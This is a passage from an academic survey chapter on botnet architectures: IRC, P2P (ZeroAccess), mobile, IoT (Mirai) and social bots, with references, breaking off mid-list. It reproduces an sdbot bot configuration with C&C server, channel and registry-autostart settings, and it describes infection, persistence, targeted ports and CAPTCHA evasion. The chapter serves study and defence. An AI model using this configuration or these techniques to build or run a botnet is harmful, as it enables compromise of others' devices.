- 27. ■ Activity response: Some other commands that are issued by the botmaster are associated with specific activities such as scanning, denial of service attacks, and email spam. Therefore, each bot generates a large amount of traffic of certain type during the same time interval. Figure 1.3b shows an example of activity responses of three bots within an organizational network in response to different commands that are sent by the botmaster. 1.3 Centralized Botnets Most of the botnets (e.g., sdbot, agobot, GTbot) that appeared in the beginning of botnets era have adopted a centralized architecture. In this architecture, the botmaster maintains a central server that communicates with the bots. The bots wait for commands from the central server. In addition, newly compromised hosts (bots) connect to the server and report their information. The server oversees the status of the bots and sends commands to be executed. This basic structure is shown in Figure 1.4. In centralized botnets, the C&C channel can be implemented using different protocols such as IRC (Internet Relay Chat), HTTP (Hyper Text Transfer Protocol), and Email. Recently, an advanced technique that is based on the Session Description Protocol (SDP) was proposed in [30] for the implementation of botnet’s C&C channel. The technique uses the SDP to construct a covert communication channel, which results in a stealthy and an effective method for controlling a botnet. The Bot Bot Bot time time time Bot Bot Bot time time time Message response (e.g. Bot ID) Activity response (e.g. SYN attack) Activity response (e.g. Port scanning) (a) Message response crowd (b) Message response crowd Figure 1.3 Spatial-temporal correlation and similarity. Figure is adopted from [14]. 10 ■ Botnet
- 28. growing interest in SDP as part of the session initiation protocol (SIP) in VoIP networks requires the research community to develop efficient detection and mitiga- tion mechanisms as described in [31]. 1.3.1 Case Study: IRC-based Botnets IRC-based botnets represent one of the most popular types of centralized botnets that have appeared in the early stages of the botnets threat. There are several families of IRC-based botnets such as SDbot and Agobot. The release of the bot code to the public has allowed new variants of each family to appear within a short period of time. These botnets share similar characteristics and were used for different types of attacks. IRC-based botnets utilize the communication capability of the IRC protocol, which allows point-to-point and point-to-multi-point com- munications. The protocol is scalable in the sense that it enables a large number of hosts to transfer data. The availability, flexibility, and modularity of the IRC protocol allow users to make modifications and use it in their applications. Hence, developers of botnets tend to use the IRC protocol to shorten their botnet development time while providing efficient communication protocol. As shown in Figure 1.5, the IRC-based botnet life cycle follows five steps, which are [1]: 1. Scanning for vulnerable hosts: Usually, the bot code is designed to automatically search for vulnerable hosts. This makes it similar to Internet worms, which means that worm scanning strategies can be adopted in the process of a botnet formation. Botmaster C&C server Botnet Figure 1.4 Centralized botnet. Botnet Architectures ■ 11
- 29. 2. Installing the bot code: The compromised machine downloads a binary image of the bot code from an old botnet member (a machine that has joined the botnet earlier) or from a malware server. A malware server is a dedicated machine that is configured by the botmaster in advance for this purpose. Afterward, the down- loaded binary code (bot) gets installed on the machine. Every time the machine is rebooted, the bot starts executing automatically. With the new sophisticated methods of malware distribution techniques, it is not necessary to strictly follow steps 1 and 2 in order to find and infect vulnerable machines. There are several methods that result in a host being infected by a bot malware. For example, Gaobot and its variants infect hosts through the use of Instant Messengers, file sharing, and different software vulnerabilities. In addition, some methods persuade victims to click on a link or a file that result in the execution of a malicious code (e.g., clicking an email attachment). 3. Resolving the DNS name of the IRC server: Today’s botnet developers rely on domain names instead of IP addresses. Hence, a bot contacts DNS servers to resolve the domain name and get the IP address of the IRC server. The domain names are hard-coded in the bot’s binary. 4. Joining the IRC server: After a bot resolves the IP address of the IRC server, it establishes a session and join the C&C channel of the server. This channel is also defined in the bot’s binary code. This process requires three types of authentication: (i) The bot has to authenticate itself to the C&C server using a password or an encryption key that is already included in the bot’s binary. This method prevents botnet’s infiltration by other systems or bots. (ii) The bot has to authenticate itself to the chat channel of the IRC server. This prevents other users or bots from joining the channel. Users and security researchers try to join C&C channels to find the active members and commands that are issued. (iii) The botmaster has to authenticate itself to the bot’s population using a password or an encryption key that is stored in the bot’s binary in order to prevent other botmasters or researchers from controlling the botnet. 5. Receiving commands from the botmaster: Bots receive commands on the IRC channel (the channel’s topic). The channel’s topic specifies the commands that are to be executed by the bots. In terms of the botnet lifetime that was described in Section 1.2, steps 1 and 2 represent the recruitment stage, steps 3 and 4 represent the C&C establishment stage, and step 5 represents the activity stage. To illustrate the operation of IRC-based botnets, consider the configuration of the bot sdbotv5b, which is shown below. Bots are configured to match the settings of the IRC server that has been designed in advance as a C&C server. This includes passwords that are used for authentication, the server name, the port number, the chat channel name, and other parameters as indicated in the bot configuration below. 12 ■ Botnet
- 30. // bot configuration const char botid[] = “bot1”; // bot id const char password[] = “password”; // bot password const int maxlogins = 4; // maximum number of simultaneous logins const char server[] = “ircserver”; // server const int port = 7777; // server port const char serverpass[] = “”; // server password const char channel[] = “#nes554”; // channel that the bot should join const char chanpass[] = “”; // channel password const char server2[] = “”; // backup server (optional) const int port2 = 6667;//backup server port const char channel2[] = “”; // backup channel (optional) const char chanpass2[] = “”; // backup channel password (optional) const BOOL topiccmd = FALSE; // set to TRUE to enable topic commands const BOOL rndfilename = FALSE;//use random file name const char filename[] = “nes554SDbot.exe”; // destination file name const BOOL regrun = TRUE; // use the Run registry key for autostart const BOOL regrunservices = TRUE; // use the RunServices registry key for autostart const char valuename[] = “Configuration Loader”; // value name for autostart Figure 1.5 IRC-based botnet life cycle. Figure is adopted from [1]. Botnet Architectures ■ 13
- 31. const char prefix = ’.’; // command prefix (one character max.) const char version[] = “sdbot v0.5b by [sd]”; // bot’s VERSION reply const int cryptkey = 0;//encryption key (not used right now) const int maxaliases = 16; // maximum number of aliases. Once the bot joins the C&C channel, it becomes ready to receive and execute commands. For example, the botmaster may instruct the bot to perform SYN flood attack against a certain target, or to download a certain malicious file from the Internet. For better management, botmasters usually adopt a hierarchical structure rather than the basic centralized structure. In a hierarchical topology, the botmaster controls a set of machines that are called bot controllers. Each of the bot controllers manages a set of bots. Using multiple botnet controllers make the C&C channel more resilient. Centralized botnets (both basic and hierarchical) are easier to be created and managed. Moreover, they respond to commands faster than the P2P structure. However, botmasters lose the control over the C&C channel once it gets shutdown by detection and isolation methods. In addition, if the C&C server is hijacked, the botnet structure and behavior are discovered. Hence, some active monitoring techniques are employed to discover malicious traffic and activities of public IRC servers [1,21,32]. 1.4 P2P Botnets The design of centralized botnets has a major drawback of having a single point of failure. Therefore, some attackers used a P2P technology for C&C, where each bot communicates with a subset of other bots in the network [33–35]. The improvement of P2P technology and the widespread of P2P file sharing have attracted botmasters to adopt this technology in constructing a new generation of botnets with inherited features of robustness, scalability, and resilience. Table 1.1 lists some of the most popular P2P botnets that appeared in the wild and remained active for a long period of time. P2P botnets are more complex when compared to the traditional centralized botnets. In this architecture, bots reside on compromised machines within the botnet network and communicate with each other rather than through a C&C server. Hence, the bots in the network send commands to each other. Each bot keeps a list of its neighbors. When receiving a command from one of its neighbors, the bot sends that command to the other neighbors in the list. This scenario results in a network that is called a zombie network. Once a botmaster gets an access to one host in the zombie network, the botmaster obtains a full control of the botnet network. Each host in the P2P network acts as both a client and a server, since there is no centralized point in this architecture. P2P communication provides the attackers with higher capabilities than the centralized C&C architecture. In P2P botnets, if defenders are able to discover 14 ■ Botnet
- 32. a subset of the bots and isolate them, the communication among the rest of the bots is not disrupted. From a botmaster’s perspective, it is more difficult to create and manage P2P botnets. Moreover, it takes more time to propagate C&C messages to all botnet members. Hence, botmasters prefer to use simple designs when developing P2P C&C channels. For example, Phatbot stores the list of bots in Gnutella cache servers. This makes it possible to discover the botnets by probing the cache servers. On the other hand, Sinit uses random probing in order to find the bot members. In P2P botnets, if the IP address of a bot is changed (dynamic IP addresses), then the bot leaves the botnet network [32]. Typically, P2P C&C channel is implemented using existing P2P file sharing applications, such as Gnutella, Kazaa, and eMule, or can be implemented using proprietary protocols. The basic structure of P2P botnet is shown in Figure 1.6. Table 1.1 Popular P2P botnets Botnet Year C&C Main activity Nagache January 2006 Based on custom protocol Theft of financial credentials via keystroke logging Storm [37] January 2007 Based on Overnet, a Kademlia implementation Email spam and DDoS attacks via keystroke logging Sality [38] January 2008 Unstructured P2P network Stealthy scanning targeting critical Voice communications infrastructure Waledac [39] December 2008 HTTP communication and a fast-flux based DNS network Email spam ZeroAccess v1 July 2009 Unstructured P2P architecture Bitcoin mining and click fraud ZeroAccess v2 February 2012 Unstructured P2P architecture Bitcoin mining and click fraud Kelihos v1 [40] December 2010 Unstructured P2P botnet Email spam and ID theft Miner [41] August 2011 Unstructured P2P botnet Bitcoin mining Zeus [42] September 2011 Unstructured P2P botnet Steal credentials (particularly for financial institutions) from infected systems Botnet Architectures ■ 15
- 33. P2P botnets can be represented as a graph with bots being the vertices and the links between bots are the edges. For example, in Zeus, each bot in the graph has a peer-list [36]. Each bot knows a subset of bots and maintains connections to them. A peer-list request is issued by a bot when it starts to loose connections from its original list. A bot that receives a peer-list request shares its peer-list with the bot requesting this information allowing that bot to expand its own peer-list. However, in most P2P botnets, the architecture is not entirely P2P as it includes a central server for bootstrapping and getting initial peer-lists such as in Zeus [36]. In the following subsection, we present ZeroAccess botnet as a case study of P2P botnets. 1.4.1 Case Study: ZeroAccess P2P Botnet ZeroAccess (ZA) is a popular and complex P2P botnet. Two versions of the ZA malware appeared in September 2011 (ZAv1) and April 2012 (ZAv2). The two versions have infected millions of machines at that time [43]. ZA botnet malware is considered to be a remarkable botnet because of many features in its design and operation. This includes its ability to infect both Windows 32-bit and 64-bit machines, being able to hide itself and stay on the infected system, the P2P C&C channel structure where nodes are labeled as “supernodes” or as “regular nodes,” and the use of encryption and obfuscation to hide its communication patterns. ZA malware rootkit evolved over time with new functionalities and features that were introduced subsequently. In the following, we discuss the main steps of ZA Botnet Botmaster Figure 1.6 Basic architecture of P2P botnets. 16 ■ Botnet
- 34. life cycle focusing on the techniques that were used for infection, installation, and C&C of the ZA malware. 1. Malware distribution: Two standard mechanisms were used to distribute ZA malware trojan. The first mechanism is Exploit Packs that comes as a collection of JavaScripts that take advantage of known vulnerabilities in applications such as flash players, web browsers, and PDF readers. The infection occurs by compromising several legitimate websites using attack methods such as SQL injection attack and stolen FTP credentials. There- fore, attackers insert a malicious JavaScript code into pages of these websites in order to redirect websites’ visitors to the mothership servers that host the original Exploit Pack. Attackers trick users to visit these websites using different techniques such as email spam campaigns. Email spam campaigns contain links to these websites with some attractive contents that increase the chances of clicking the links. Attackers also use search engine manipula- tion methods to make the compromised websites appear at the top of the search engine results page. The second mechanism that was used to spread ZA malware trojan is through social engineering. This technique aims to attract users to download and run a malicious executable. For example, end users are usually attracted to download popular games, a pirated version of a game, or any other attractive piece of software that is made available on websites under the control of the attacker. 2. Malware installation: ZA used ZwQuery Information Process API to determine whether the operating system is 32-bit or 64-bit, and based on that, it decides the appropriate installation mechanism. One of the installation requirements of ZA trojan is to obtain an escalated privilege. To gain this, the malware has to overcome the user account control (UAC) mechanism that is deployed in Windows operating system to prevent illegal access. This is achieved, by including a legitimate payload (e.g., adobe flash player) in addition to the malicious one as part of the software that is to be installed. This method tricks the user to provide the required access privilege via accepting warning messages in order to install the legitimate software. For example, the system may display a warning message to accept the installation of some legitimate software. By clicking OK, the user indirectly gives ZA trojan the required privilege that allows it to be installed. 3. Staying on the system: ZA rootkit adopted several techniques to stay on the infected system and remain hidden without being detected. This includes a kernel manipulation technique. The ZA rootkit creates a malicious copy of a kernel mode driver and overwrite the original driver by uploading its own code in the kernel space. This makes it difficult to distinguish ZA from the legitimate driver. Another technique is to store malicious files in a hidden volume in the file system. The volume is created specifically for this purpose in Botnet Architectures ■ 17
- 35. order to avoid detection. Later versions of ZA have adopted the technique of storing its malicious encrypted files in a legitimate looking Windows directory and restricting access to that directory. The differences between 32-bit and 64- bit versions were eliminated gradually in subsequent versions of ZA malware by moving away from relying on the kernel components. In most recent versions of ZA, the malware injects itself in common Windows services such as explore. exe and services.exe. In addition, ZA disables security services in Windows such as Windows firewall, the Windows security center, and Windows defender. 4. Command and control: After installation, ZA malware connects back to a central server with an IP address that is hard-coded in the bot’s binary. Through this connection, the bot provides the server with information about the infected machine and its configuration. Also, it authenticates itself to the server by providing it (e.g., the server) with a randomly generated domain name. This domain name corresponds to a non-existing server that changes from day to day as the domain generating algorithm uses the current date as a seed value for the domain generation. It serves the purpose of authenticating the bot by making sure that the provided domain name belongs to the set of domains. The generated domains are included in advance in the bot binary. If the provided domain name is invalid, the server aborts the connection. Therefore, the server can make sure that only ZA bots are connected to the server, which prevents botnet infiltration attempts. Each ZA malware instance is shipped with an initial list of 256 IP addresses that represent the infected machines. These IPs are ordered based on their last seen time. This initial contact list is used by the bot to join the ZA P2P network by initiating connections to certain port numbers. Bots that have public IP addresses are labeled as super nodes, while bots that resides behind a NAT box are labeled as regular nodes. For a node to be part of the P2P network, it should be reachable from the outside. 5. Attack activity: Throughout its lifetime, ZA has been the source of different malicious activities including spam, click fraud, and bitcoin mining. Bitcoin mining represents a new type of botnet activity that is associated with the developments of digital currency. The idea is to leverage the collective computational power of bot machines to generate bitcoins for the bot- master’s advantage. 1.5 Mobile Botnets Modern mobile devices have attracted the attention of attackers because they provide enough resources to launch large-scale attacks. Currently, mobile devices are powerful platforms that are equipped with high computation power, large storage, Internet connectivity, and wide range of applications. In addition, 18 ■ Botnet
- 36. technology is improving the battery life time of mobile devices, which allows them to withstand high computations and network demands. Smartphones are becoming very popular in recent years. At the same time, a new generation of malware that targets these devices has evolved and is becoming a major threat for this technology. In most cases, this malware aims at constructing smart- phone botnets. A smartphone botnet is a group of compromised smartphones that are remotely controlled by botmasters via C&C channels [44]. These botnets provide attackers with capabilities to perform many nefarious activities that greatly violates users’ privacy. This includes but not limited to, installing new applications, request- ing a URL from the phone, sending spam, achieving financial gains by sending premium SMSs, making phone calls, spying on users, and displaying ads and notifications. The main factors that make smartphones (e.g., iPhone and Android- based phones) an attractive target for attackers include: ■ High adoption rate of smartphones. With the emergence of mobile Internet access and the proliferation of mobile applications, smartphones have witnessed significant technological advancements. Smartphone prices have dropped sig- nificantly while sales have increased sharply in recent years [45]. It is expected that the sales will increase in the coming years especially in the emerging markets. This provides a prolific environment for hackers to construct mobile botnets. ■ Computational power of smartphones. Today’s smartphones have computa- tional power and communication capabilities (in terms of memory, CPU, and transmission rate) that outperform some generations of PCs. This makes them a very attractive target in order to perform different types of nefarious activities such as sending spam and performing DDoS attacks. ■ Sensitive information available on smartphones. The private information that users save on their smartphones make them a valuable target for attackers. A smartphone can be viewed as a personal wallet that contains highly sensitive information that includes banking accounts, credit card numbers, personal pictures, phone calls, private messages, GPS location, and access to phone camera. ■ Smartphones can be easily infected by malware. Smartphone users tend to accept downloads from untrusted sources. Attackers usually inject malicious codes into mobile applications before uploading them to the Android market. ■ Lack of security protection for smartphones. The security market for smart- phones is still immature with a limited number of antimalware or antivirus products that are designed to address vulnerabilities in smartphone and for malware detection. This means that a malware that targets smartphones can go without being detected in most cases. ■ Internet connectivity. Smartphones are usually connected to the Internet most of the time either through WiFi networks or data services. Users Botnet Architectures ■ 19
- 37. tend to keep their smartphones turned on with Wifi or data connection being enabled in order to stay connected and have access to their favorite social networking applications. ■ C&C implementation. Mobile botnets in general and smartphone botnets in particular offer new approaches for C&C implementation that were unavail- able for PC-based botnets. Instead of relying on traditional application layer protocols (e.g., HTTP, IRC, and file sharing applications) for C&C imple- mentation, other techniques, that are specific to the mobile phone technology, can be used for the C&C implementation. This includes short messaging services (SMS), push notification services that are available in mobile applica- tions, short URL services, and Bluetooth. It is important to mention that there are some limitations regarding mobile botnet construction. These limitations include: (i) Smartphones are battery limited, which requires botmasters to account for bot devices that are running out of power. This has an impact on the operation of the mobile botnet, especially when mobile botnets are involved in activities that require high processing and communication capabil- ities. If the battery power of a device drops faster than a normal behavior, then the user may suspect that there is something wrong with his/her phone. (ii) Also, mobile botnets are usually involved in an increasing consumption of data usage or SMS messages leading to an additional billing cost. (iii) Smartphones are assigned private IP addresses rather than public IP addresses, which restricts the creation of C&C channel when compared to the PC-based botnets. The life cycle of mobile botnets is very similar to that of the traditional PCs based botnets in terms of the main stages as described in Section 1.2. Also, mobile botnet architecture can be centralized or distributed (P2P) in a way similar to traditional botnets. However, there are major differences in C&C channel implementation, infection vectors, and approaches. This is due to the additional features that are available in smartphones such as Bluetooth, SMS, GPS sensor, and notification services. Some mobile botnets that appeared in the early period of mobile botnets have used conventional HTTP-based C&C channel for communication. For exam- ple, SymbOS.Yxes botnet appeared in 2009 to target the Symbian platform [46], Ikee.B mobile botnet that targeted jailbroken iPhones in 2010 [47], and GEINIMI mobile botnet, which is considered to be the first Android botnet [48]. Subsequently, other techniques that are specific to mobile phones were exploited to implement the C&C channel for communication. ZeuS, for example, is an SMS-based botnet that targets Blackberry, Windows, and Symbian mobile platforms [49]. In addition, public blogs were used to implement the C&C channel of an Android botnet, which is called AnserverBot, in 2011 [50]. Advanced C&C architectures for mobile botnets were proposed in [51]. These architectures leverage Tor’s Hidden services and DNS protocol to obfuscate attackers’ identity and increases the botnet’s resiliency. 20 ■ Botnet
- 38. 1.5.1 Examples of Mobile Botnets In this subsection, we provide a description about SMS-based mobile botnets and cloud-based push-styled mobile botnets. These two types of botnets represent typical examples of mobile botnets that employ C&C mechanisms. 1.5.1.1 SMS-based Mobile Botnets The design and implementation of SMS-based smartphone botnet were presented in [52]. In this type of botnets, commands are delivered to infected smartphones (bots) via SMS without being noticed by phone users. Each command is encoded in a fixed size text message. Bots read these messages, decode them, and act to execute the commands according to a database that is known for the bot during the installation phase. Using SMS messages for C&C control provides more resilience and is considered more suitable for smartphone botnets due to several reasons: (1) It does not require Internet connectivity. Even if the phone goes offline or becomes outside a coverage area, commands are buffered at the service center and delivered when the phone becomes reachable. (2) SMS is a very popular service and among the top used data applications in the world. (3) Usually, smartphones have private IP addresses because they connect to access points or cell towers. Therefore, using SMS for C&C provides a suitable mechanism to deliver commands to bot machines even if they are unreachable by their private IP addresses. (4) It is difficult for a user to distinguish between SMS messages that are related to a botnet activity and spam SMS messages. A unique passcode is hard-coded in the bot binary in order to identify each bot. While it is possible to include a unique passcode for each bot, the design in [52] suggested that each group of bots, which is responsible of the same botnet activity (e.g., Spam, ID theft, etc.), have the same passcode. The hard-coded passcode in a bot binary is included in SMS messages that are sent and received by that bot. To achieve stealthy operation, a malicious Android application, which is installed on each bot, registers itself as a background process in order to be able to send out SMS messages, get notified when receiving SMS message, read received messages, decode them, and finally delete them to avoid being noticed by the phone owners. 1.5.1.2 Cloud-Based Push-Styled Mobile Botnets Cloud-based push-styled mobile botnets was presented in [53]. Push notification is a service that is widely available on smartphone platforms. In this service, mobile applications receive notifications messages from the application servers through push based messaging servers that are hosted in the cloud. There are several advantages for push notification service that makes it an attractive feature in mobile phones. For example, with this service, there is no need for the application server to periodically Botnet Architectures ■ 21
- 39. check the mobile device to find out whether the phone is ON or OFF. In addition, notifications are sent to mobile devices without the need for a continuous probing of application servers. These features simplify the mobile application development and greatly reduce the workload on application servers. This explains the popularity of this service in most smartphone platforms and hence, can be utilized for the implementation of C&C in mobile botnets. A prototype of cloud-based push-styled mobile botnets using Google Cloud to Device Messaging (C2DM) service for Android was presented in [53]. The main idea is to disseminate botmaster commands to the bots population in a stealthy manner as part of the normal C2DM traffic. This means that there is no direct communication between a botmaster and the bot devices. Instead, communica- tion between them is done through the C2DM service. Implementing the C&C for such botnets involves bot registration stage and command dissemination stage. Although C2DM was officially deprecated, similar mechanisms, such as Firebase Cloud Messaging (FCM) from Google, can be used to construct cloud-based push-styled mobile botnets. 1.6 IoT Botnets IoT botnets, such as Mirai, QBot, BASHLITE, Hajime, and their variants, aim to compromise IoT devices that are weakly configured and connected to the Internet. Most recently, Torii bot was discovered and is considered to be more sophisticated than previously known IoT botnets [54]. IoT devices are distributed worldwide with the goal of having them running all the time such as printers, DVRs, network routers, IP cameras, and CCTVs. The manufacturers of IoT devices focused on devices functionality and ease of installation to attract customers. In addition, many users leave the default username and password that were shipped with the device unchanged. Mirai and other IoT botnets exploit this simplicity of devices and compromise hundreds of thousands of them relying on a dictionary of default user names and passwords from different vendors. A large number of devices (victims) are orchestrated to launch DDoS attacks against selected targets. Also, a large number can be used for spamming and advertisement fraud. IoT botnets architecture consists of four main compo- nents, which are: the Bot, the C&C server, the Loader, and the Report server [55]. The role of each of these components is described below: 1. The Bot: which is the malware that infects a vulnerable IoT device. It has two roles: the first role is to brute force search for new victims to be compromised. New victims are IoT devices that were misconfigured, have software holes, or have default username and passwords. Hence, it is important for system administrators to install most recent software patches, 22 ■ Botnet
- 40. change passwords, and monitor their devices for any abnormal behavior. The second role is to execute commands that are sent by the C&C server such as the DDoS attack. 2. The C&C Server: which is controlled by the botmaster to send commands to the bots such as launching a DDoS attack. The botmaster is a person (hacker) who manages the botnet, develop, modify, and update bots’ programs and database. A DDoS command includes packets type (e.g., SYN flooding), the target address, and the duration of traffic. 3. The Loader: when a new IoT device is discovered and compromised by a bot, the bot executes a command to find the newly compromised device’s architecture and software. Then, the new device is directed to download the corresponding botnet binaries from the loader server. The loader server has many binaries for different device architectures including ARM and Intel. 4. Report Server: it contains different information and status of all the bots (infected devices) in the botnet. Information includes IP address, port number, device architecture, and login credentials. The threat of IoT botnets arises from the large number of infected devices, which is in the order of hundreds of thousands. These devices can result in a tremendous network traffic if they are used to launch DDoS attacks. For example, a DDoS attack on Krebs has reached to an unprecedented traffic of more than 600 Gbps in 2016 [56]. Researchers have shown that Mirai botnet has infected more than 65,000 IoT devices in nearly 20 hours and the number has increased to reach 300,000 devices [57]. This number is likely to increase, as the use of IoT devices are growing, which is expected to have more than one hundred billion devices by 2030 [58], unless effective countermeasure solutions are developed and used. The infection process is based on brute-force search of devices with default user name and passwords using remote connection (telnet) on standard open ports. TCP ports 23, 2323, 7547, 5555, 23231, 37777, 6789, 22, 2222, 32, and 19058 are the most popular ones [59]. Furthermore, most of UDP ports are targeted by compro- mised IoT devices. Among the top targeted UDP ports are: port 37547, 137, 53413, 37547, 32124, and 28183 [60]. The IP addresses are randomly generated. After a successful connection to an IoT device, the botnet closes the open ports to prevent other botnets from trying to connect to the device. Default usernames and passwords, in addition to simple passwords (such as 123456) are hard-coded into the IoT botnet scripts. The IoT botnet resides in the memory of compromised IoT devices. A restart or power-off of the device removes the botnet. However, this is difficult to be done by system or network administrators. For example, if the infected devices are routers, the network will be interrupted while routers are being powered-off and then powered-on. Also, this action can result in a service level agreement (SLA) violation of services with high availability. Botnet Architectures ■ 23
- 41. The release of the source code of the Mirai botnet made it possible for researchers to understand the behavior of IoT botnets. This behavior is common in IoT botnets that were discovered, although some of them are more advanced than the original Mirai. Defining policies and rules that can detect and capture compromised devices can fight against the spread of IoT botnets. Access, communication, and usage polices are among these desired definitions [61]. Moreover, smarter and more intelligent methods can be developed using machine learning algorithms in order to efficiently detect compromised IoT devices and alert system administrators to isolate them from the network or block them automatically. For example, N-BaIoT is a method that uses deep learning for anomaly detection of network traffic [62]. On another hand, a method called AutoBotCatcher relies on the idea of mutual entities in the botnet community. For example, bots communicate with a C&C server. This makes the C&C server a mutual entity [58]. Based on identifying the botnet communities, AutoBotCatcher can be utilized by ISPs and network administrator to further investigate suspicious devices. In addition, methods such as encryption of IoT devices memory and data, easy and automated techniques to modify devices passwords, using different passwords than the ones that were shipped from factories, restricting access of ports on devices, and updating the devices’ firmware with the latest patches are among effective practices that prevent the widespread of IoT botnets [63]. 1.7 Social Botnets Socialbots are autonomous software programs that target online social networks (OSNs) such as Facebook and Twitter. These programs mimic the behavior of real users (humans) through posting comments (or tweets), re-posting messages that others have posted, sending connection requests, accepting requests from others, following others, etc. Socialbots aim to achieve mainly three objectives. The first one is to launch campaigns in order to promote some opinions or ideas in a community of users and making some topics popular. The second is to collect data especially private user information. These information becomes available once a user accepts a connection request from the socialbot. The third reason is to alter the graph structure of OSNs, which results in having fake or misleading patterns in the social network graph (vertices and edges). Boshmaf et al. showed that today’s OSNs are vulnerable to socialbots and conducted experiments on Facebook OSN [64]. In addition, Freitas et al. conducted socialbot experiments on Twitter OSN and showed that socialbots can infiltrate Twitter [65]. 1.7.1 Operation The following are typical steps that are carried out by socialbot developers for infiltration of OSNs. 24 ■ Botnet
- 42. 1. Automatic creation of email accounts as most OSNs require an email for verification. Hence, an adversary relies on email providers who allow an unlimited number of email accounts. Some adversaries might choose to create the email accounts manually. 2. Handling CAPTCHA as most OSNs rely on that technique to validate users. Different methods are used by socialbots to break CAPTCHAs in order to automate the process of infiltrating OSNs especially to launch a large-scale attack. For example, socialbot developers use script identification, optical character recognition methods, utilize botnets that ask users to recognize CAPTCHAs, or rely on cheap labor business (CAPTCHA breaking business) to break CAPTCHA [64,66,67]. 3. Creating a profile for the accounts, which includes a job title and a picture. This is very important in order to increase attractiveness. For example, a person who has professional career attracts users. In addition, a good looking picture has the greatest impact as described in [64]. Female profiles have higher successful infiltration rate than male profiles. However, they both get similar acceptance rate if they have high number of friends (contacts). Developers of socialbots follow random behaviors in performing activities (i.e., posts, request, follow-back, etc.) in order to avoid being detected such as Realboy project by Zack Coburn and Greg Marra [68]. Some methods use social network honeypots in order to trap adversaries. These methods generate artificial profiles, monitor the profiles, and analyze their activities [69]. Designing and collecting datasets of OSNs can help in developing intelligent techniques that rely on anomalous behaviors for detecting socialbots [70]. Machine learning, classification, and artificial intelligence techniques have been developed in order to detect and isolate socialbots from OSNs [71–73]. However, more robust and sophisticated methods are still needed in order to detect non-trivial socialbot behaviors. 1.8 Conclusion Botnets are among the top cyber security issues in today’s Internet. Botnets have witnessed major advancements in recent years in terms of their architectures, attack activities, and types. The enormous growth of the Internet and its expansion in recent years has contributed greatly in the development of new generation of botnets that leverage the vulnerabilities of new protocols, applications, and devices that composes the Internet. The nature and scale of botnet attacks have increased over time. Traditionally, botnets have been used to conduct various forms of DDoS attacks, email spam campaigns, click fraud and identity theft. Recently, botnets were used in new malicious activities that include malware distribution, fast flux network services, social campaigns and digital currency mining. Over the past fifteen years, significant Botnet Architectures ■ 25
- 43. amount of research has been done in this area focusing on botnet characterization and detection. This chapter provided a detailed discussion about botnets and their main characteristics. At the beginning, the chapter described the main steps of botnet life time and highlighted the main characteristics that include the botnet size, geogra- phical distribution, and spatial temporal correlation. The strength and resilience of any botnet depend on the implementation of its C&C channel. Centralized and P2P botnets were discussed as the main two architectures for the botnets commu- nication topology. This includes traditional PC based botnets, mobile botnets, IoT botnets and social botnets. For each type of the botnets, the main features were highlighted and the C&C implementation methods were discussed. Overall, this chapter provided a comprehensive review of botnets, their key features, the differ- ences between botnet types, and their C&C implementations. Future research in this field is expected to focus on efficient techniques for botnet detection, while taking into consideration the new types of botnets that have emerged in recent years and the new techniques that are used to implement stealthy and resilient C&C. References [1] Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, and Andreas Terzis. A multi- faceted approach to understanding the botnet phenomenon. In Proceedings of the 6th ACM SIGCOMM Conference on Internet Measurement, IMC ’06, pages 41–52, New York, NY, USA, 2006. ACM. [2] T. Holz. A short visit to the bot zoo [malicious bots software]. IEEE Security Privacy, 3(3):76–79, May 2005. [3] D. Geer. Malicious bots threaten network security. Computer, 38(1):18–20, Jan 2005. [4] B. McCarty. Botnets: Big and bigger. IEEE Security Privacy, 99(4):87–90, Jul 2003. [5] G. P. Schaffer. Worms and viruses and botnets, oh my! rational responses to emerging internet threats. IEEE Security Privacy, 4(3):52–58, May 2006. [6] Keman Huang, Michael Siegel, and Stuart Madnick. Systematically understanding the cyber attack business: A survey. ACM Computing Surveys, 51(4):1–70:36, Jul 2018. [7] Europol and NATO Strategic Directions South NSDS. In Internet Organised Crime Threat Assessment (IOCTA 2017). European Union Agency for Law Enforcement Cooperation (Europol), 2017. [8] Ayesha Binte Ashfaq, Zainab Abaid, Maliha Ismail, Muhammad Umar Aslam, Affan A Syed, and Syed Ali Khayam. Diagnosing bot infections using bayesian inference. Journal of Computer Virology and Hacking Techniques, 14(1):21–28, 2018. [9] Shui Yu, Guofei Gu, Ahmed Barnawi, Song Guo, and Ivan Stojmenovic. Malware propagation in large-scale networks. IEEE Transactions on Knowledge and Data Engineering, 27(1):170–179, 2015. 26 ■ Botnet
- 44. [10] Terry Nelms, Roberto Perdisci, Manos Antonakakis, and Mustaque Ahamad. Towards measuring and mitigating social engineering software download attacks. In USENIX Security Symposium, pages 773–789, 2016. [11] Francois Mouton, Louise Leenen, and Hein S. Venter. Social engineering attack examples, templates and scenarios. Computers & Security, 59:186–209, 2016. [12] Amir Javed, Pete Burnap, and Omer Rana. Prediction of drive-by download attacks on twitter. Information Processing & Management, 2018. [13] Antonio Nappa, M. Zubair Rafique, and Juan Caballero. The malicia dataset: Identification and analysis of drive-by download operations. International Journal of Information Security, 14(1):15–33, 2015. [14] Guofei Gu, Junjie Zhang, and Wenke Lee. Botsniffer: Detecting botnet command and control channels in network traffic. In Proceedings of the 15th Annual Network and Distributed System Security Symposium (NDSS’08), Feb 2008. [15] An Wang, Wentao Chang, Songqing Chen, and Aziz Mohaisen. Delving into internet ddos attacks by botnets: Characterization and analysis. IEEE/ACM Transac- tions on Networking, 26(6): 2843–2855, 2018. [16] Aditya K Sood, Sherali Zeadally, and Richard J Enbody. An empirical study of http-based financial botnets. IEEE Transactions on Dependable and Secure Comput- ing, 13(2):236–251, 2016. [17] Son Dinh, Taher Azeb, Francis Fortin, Djedjiga Mouheb, and Mourad Debbabi. Spam campaign detection, analysis, and investigation. Digital Investigation, 12:S12– S21, 2015. [18] Paul Barford and Vinod Yegneswaran. An inside look at botnets. In Mihai Christodor- escu, Somesh Jha, Douglas Maughan, Dawn Song, and Cliff Wang, editors, Malware Detection, pages 171–191, Boston, MA, 2007. Springer US. [19] Anirudh Ramachandran and Nick Feamster. Understanding the network-level behavior of spammers. SIGCOMM Computer Communication Review, 36(4):291– 302, Aug 2006. [20] Expert: Botnets no. 1 emerging internet threat. www.cnn.com/2006/tech/internet/ 01/31/furst, Access Date: January 2019. [21] Evan Cooke, Farnam Jahanian, and Danny McPherson. The zombie roundup: Understanding, detecting, and disrupting botnets. In Proceedings of the Steps to Reducing Unwanted Traffic on the Internet on Steps to Reducing Unwanted Traffic on the Internet Workshop, SRUTI’05, pages 6–6, Berkeley, CA, USA, 2005. USENIX Association. [22] M. 